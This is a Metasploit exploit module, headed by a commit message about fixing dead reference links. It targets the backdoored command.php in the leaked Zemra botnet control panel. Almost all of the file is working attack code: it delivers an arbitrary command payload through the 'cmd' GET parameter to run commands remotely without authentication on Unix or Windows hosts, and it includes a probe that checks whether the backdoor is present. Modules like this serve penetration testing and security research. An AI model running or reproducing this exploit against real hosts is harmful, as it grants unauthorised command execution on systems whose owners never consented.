a54f3d4707
doing these "by domain" now, piecemeal. this PR fixes all broken references to the "insecurety" website, which is long dead.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
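# Exploit for the backdoor shipped inside the leaked Zemra botnet CnC panel
# source: a `command.php` that runs whatever arrives in its `cmd` GET
# parameter. The module simply delivers a cmd-style payload through that
# parameter; no authentication or session handling is involved.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zemra Botnet CnC Web Panel Remote Code Execution',
        'Description' => %q{
          This module exploits the CnC web panel of Zemra Botnet which contains a backdoor
          inside its leaked source code. Zemra is a crimeware bot that can be used to
          conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jay Turla <@shipcod3>', # Metasploit Module
          'Angel Injection', # Initial Discovery (PoC from Inj3ct0r Team)
          'Darren Martyn <@info_dox>' # Initial Discovery
        ],
        'References' => [
          ['URL', 'http://0day.today/exploit/19259'],
          ['URL', 'https://web.archive.org/web/20140207114942/http://insecurety.net/?p=144'], # leaked source code and backdoor intro
          ['URL', 'http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot']
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 10000,
          'DisableNops' => true,
          'Compat' => { 'PayloadType' => 'cmd' }
        },
        'Platform' => %w[unix win],
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['zemra panel / Unix', { 'Platform' => 'unix' }],
          ['zemra panel / Windows', { 'Platform' => 'win' }]
        ],
        'DisclosureDate' => '2012-06-28',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of the backdoor inside Zemra Botnet CnC Web Panel', '/Zemra/Panel/Zemra/system/command.php'])
      ]
    )
  end

  # Probes the backdoor by sending a random alphabetic token as the command.
  #
  # The token is not a real command, so at worst the target tries to run a
  # nonexistent binary; the request will still show up in the panel's web logs.
  # The original version discarded the response and then read an undefined
  # `res`, and it also went through http_send_command, whose fail_with aborts
  # the module instead of yielding a CheckCode. Both are fixed here: the
  # request is issued directly and every outcome maps to a CheckCode.
  #
  # The `/cmd/` body match is the signature the module has always used; it is
  # weak (any page mentioning "cmd" matches). NOTE(review): confirm it against
  # the backdoor's real response format before relying on it for triage.
  #
  # @return [Exploit::CheckCode] Unknown when the host does not answer,
  #   Vulnerable on a 200 whose body matches, Safe otherwise
  def check
    token = Rex::Text.rand_text_alpha(8)
    res = send_cmd_request(token)
    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Vulnerable if res.code == 200 && res.body.to_s.match?(/cmd/)

    Exploit::CheckCode::Safe
  end

  # Sends +cmd+ to the backdoor and returns the HTTP response.
  #
  # Anything other than a 200 aborts the module: Unreachable when there was no
  # response at all, UnexpectedReply when the target answered with another
  # status. Callers can therefore assume a 200 on return. The value is passed
  # through vars_get, which URL-encodes it, so the payload needs no manual
  # escaping here.
  #
  # @param cmd [String] command string the backdoor should execute
  # @return [Rex::Proto::Http::Response] the 200 response
  def http_send_command(cmd)
    res = send_cmd_request(cmd)
    fail_with(Failure::Unreachable, 'Failed to execute the command: no response from target.') unless res
    fail_with(Failure::UnexpectedReply, "Failed to execute the command: HTTP #{res.code}.") unless res.code == 200
    res
  end

  # Delivers the encoded cmd payload through the backdoor's `cmd` parameter.
  def exploit
    http_send_command(payload.encoded)
  end

  private

  # Issues the GET against TARGETURI with `cmd` set to +cmd+ and returns the
  # raw response, or nil when the target did not answer. Shared by check and
  # http_send_command so the probe path does not inherit the exploit path's
  # fail_with behaviour.
  #
  # @param cmd [String] value for the `cmd` GET parameter
  # @return [Rex::Proto::Http::Response, nil]
  def send_cmd_request(cmd)
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path.to_s),
      'vars_get' => { 'cmd' => cmd }
    )
  end
end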